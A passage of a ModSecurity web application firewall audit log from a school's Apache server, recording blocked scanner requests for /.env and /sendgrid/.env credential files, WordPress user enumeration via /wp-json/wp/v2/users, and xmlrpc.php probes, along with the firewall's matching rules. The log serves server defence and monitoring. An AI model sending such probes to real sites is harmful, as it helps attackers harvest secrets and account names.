"pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747430918360756 5246 (- - -) Stopwatch2: 1747430918360756 5246; combined=3954, p1=528, p2=3214, p3=28, p4=31, p5=90, sr=74, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --355e7248-Z-- --e6bb7230-A-- [17/May/2025:04:35:50 +0700] aCevtgTOsBn9MSWb6WJp8AAAAJM 103.236.140.4 56000 103.236.140.4 8181 --e6bb7230-B-- GET /.env HTTP/1.0 Host: wooin.epicgamer.org X-Real-IP: 139.59.136.184 X-Forwarded-Host: wooin.epicgamer.org X-Forwarded-Server: wooin.epicgamer.org X-Forwarded-For: 139.59.136.184 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --e6bb7230-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e6bb7230-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747431350891846 886 (- - -) Stopwatch2: 1747431350891846 886; combined=366, p1=331, p2=0, p3=0, p4=0, p5=35, sr=120, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e6bb7230-Z-- --90f4440a-A-- [17/May/2025:04:36:44 +0700] aCev7BKi5m5upc8uMd6eIAAAAMg 103.236.140.4 56012 103.236.140.4 8181 --90f4440a-B-- GET /.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 103.253.27.40 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 103.253.27.40 X-Forwarded-Proto: http Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --90f4440a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --90f4440a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747431404051215 897 (- - -) Stopwatch2: 1747431404051215 897; combined=318, p1=280, p2=0, p3=0, p4=0, p5=38, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --90f4440a-Z-- --86f2965d-A-- [17/May/2025:04:36:44 +0700] aCev7HyxdQCiyU1ENFciHQAAAAU 103.236.140.4 56016 103.236.140.4 8181 --86f2965d-B-- GET /sendgrid/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 103.253.27.40 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 103.253.27.40 X-Forwarded-Proto: http Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --86f2965d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --86f2965d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747431404130579 705 (- - -) Stopwatch2: 1747431404130579 705; combined=271, p1=234, p2=0, p3=0, p4=0, p5=37, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --86f2965d-Z-- --6e767d4f-A-- [17/May/2025:04:36:44 +0700] aCev7ATOsBn9MSWb6WJp-AAAAIU 103.236.140.4 56020 103.236.140.4 8181 --6e767d4f-B-- GET /.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 103.253.27.40 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 103.253.27.40 X-Forwarded-Proto: http Connection: close User-Agent: Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Accept-Language: en-US,en;q=0.9,fr;q=0.8 --6e767d4f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6e767d4f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747431404391178 748 (- - -) Stopwatch2: 1747431404391178 748; combined=317, p1=285, p2=0, p3=0, p4=0, p5=32, sr=110, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6e767d4f-Z-- --ebd1a447-A-- [17/May/2025:04:41:00 +0700] aCew7BKi5m5upc8uMd6eJwAAANE 103.236.140.4 56046 103.236.140.4 8181 --ebd1a447-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.242.37.164 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.37.164 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --ebd1a447-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ebd1a447-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747431660685614 3532 (- - -) Stopwatch2: 1747431660685614 3532; combined=1583, p1=599, p2=947, p3=0, p4=0, p5=37, sr=165, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ebd1a447-Z-- --450b5140-A-- [17/May/2025:04:41:07 +0700] aCew83yxdQCiyU1ENFciHwAAAAc 103.236.140.4 56050 103.236.140.4 8181 --450b5140-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.242.37.164 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.37.164 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --450b5140-C-- demo.sayHello --450b5140-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --450b5140-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747431667293513 4715 (- - -) Stopwatch2: 1747431667293513 4715; combined=3688, p1=449, p2=3038, p3=25, p4=24, p5=90, sr=68, sw=62, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --450b5140-Z-- --d5b26335-A-- [17/May/2025:04:42:22 +0700] aCexPnyxdQCiyU1ENFciJAAAAA4 103.236.140.4 56066 103.236.140.4 8181 --d5b26335-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 45.202.78.80 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 45.202.78.80 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --d5b26335-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d5b26335-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747431742693873 3280 (- - -) Stopwatch2: 1747431742693873 3280; combined=1426, p1=499, p2=895, p3=0, p4=0, p5=32, sr=101, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d5b26335-Z-- --07e9b347-A-- [17/May/2025:04:42:27 +0700] aCexQ3yxdQCiyU1ENFciJgAAABE 103.236.140.4 56070 103.236.140.4 8181 --07e9b347-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.242.37.14 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.37.14 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --07e9b347-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --07e9b347-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747431747778561 2544 (- - -) Stopwatch2: 1747431747778561 2544; combined=1220, p1=394, p2=795, p3=0, p4=0, p5=31, sr=71, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --07e9b347-Z-- --850fed58-A-- [17/May/2025:04:42:27 +0700] aCexQ3yxdQCiyU1ENFciJwAAAA8 103.236.140.4 56072 103.236.140.4 8181 --850fed58-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 45.202.78.80 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 45.202.78.80 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --850fed58-C-- demo.sayHello --850fed58-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --850fed58-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747431747943060 4561 (- - -) Stopwatch2: 1747431747943060 4561; combined=3630, p1=434, p2=2945, p3=24, p4=25, p5=140, sr=84, sw=62, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --850fed58-Z-- --4e736343-A-- [17/May/2025:04:42:32 +0700] aCexSBKi5m5upc8uMd6eKAAAANI 103.236.140.4 56076 103.236.140.4 8181 --4e736343-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.242.37.14 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.37.14 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --4e736343-C-- demo.sayHello --4e736343-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --4e736343-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747431752421908 5605 (- - -) Stopwatch2: 1747431752421908 5605; combined=4098, p1=557, p2=3267, p3=27, p4=25, p5=129, sr=104, sw=93, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4e736343-Z-- --fd4cc93a-A-- [17/May/2025:04:42:38 +0700] aCexThKi5m5upc8uMd6eKgAAANQ 103.236.140.4 56088 103.236.140.4 8181 --fd4cc93a-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.161.199 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.161.199 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --fd4cc93a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --fd4cc93a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747431758394635 3080 (- - -) Stopwatch2: 1747431758394635 3080; combined=1323, p1=473, p2=820, p3=0, p4=0, p5=30, sr=118, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fd4cc93a-Z-- --5748016e-A-- [17/May/2025:04:42:43 +0700] aCexU3yxdQCiyU1ENFciKQAAABQ 103.236.140.4 56092 103.236.140.4 8181 --5748016e-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.161.199 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.161.199 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --5748016e-C-- demo.sayHello --5748016e-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --5748016e-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747431763434796 5981 (- - -) Stopwatch2: 1747431763434796 5981; combined=4322, p1=583, p2=3506, p3=34, p4=66, p5=82, sr=79, sw=51, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5748016e-Z-- --95f8417c-A-- [17/May/2025:04:45:07 +0700] aCex43yxdQCiyU1ENFciLAAAAAA 103.236.140.4 56124 103.236.140.4 8181 --95f8417c-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.118.106 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.118.106 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --95f8417c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --95f8417c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747431907284311 2705 (- - -) Stopwatch2: 1747431907284311 2705; combined=1115, p1=368, p2=724, p3=0, p4=0, p5=23, sr=57, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --95f8417c-Z-- --fb34ad36-A-- [17/May/2025:04:45:13 +0700] aCex6QTOsBn9MSWb6WJp_wAAAJM 103.236.140.4 56128 103.236.140.4 8181 --fb34ad36-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.118.106 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.118.106 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --fb34ad36-C-- demo.sayHello --fb34ad36-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --fb34ad36-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747431913548839 5259 (- - -) Stopwatch2: 1747431913548839 5259; combined=3898, p1=515, p2=3167, p3=23, p4=25, p5=97, sr=80, sw=71, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fb34ad36-Z-- --b6c90f4e-A-- [17/May/2025:04:46:17 +0700] aCeyKXyxdQCiyU1ENFciLwAAAAU 103.236.140.4 56132 103.236.140.4 8181 --b6c90f4e-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.91.200 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.91.200 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --b6c90f4e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b6c90f4e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747431977188342 3354 (- - -) Stopwatch2: 1747431977188342 3354; combined=1418, p1=484, p2=901, p3=0, p4=0, p5=33, sr=81, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b6c90f4e-Z-- --a1b32727-A-- [17/May/2025:04:46:23 +0700] aCeyL-m4kjNN-hEbWjI8UwAAAFQ 103.236.140.4 56136 103.236.140.4 8181 --a1b32727-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.91.200 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.91.200 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --a1b32727-C-- demo.sayHello --a1b32727-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --a1b32727-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747431983877688 5352 (- - -) Stopwatch2: 1747431983877688 5352; combined=4061, p1=569, p2=3262, p3=22, p4=25, p5=105, sr=109, sw=78, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a1b32727-Z-- --b72f3904-A-- [17/May/2025:04:48:06 +0700] aCeylgTOsBn9MSWb6WJqAQAAAJY 103.236.140.4 56158 103.236.140.4 8181 --b72f3904-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.85.248 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.85.248 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --b72f3904-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b72f3904-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747432086050750 3609 (- - -) Stopwatch2: 1747432086050750 3609; 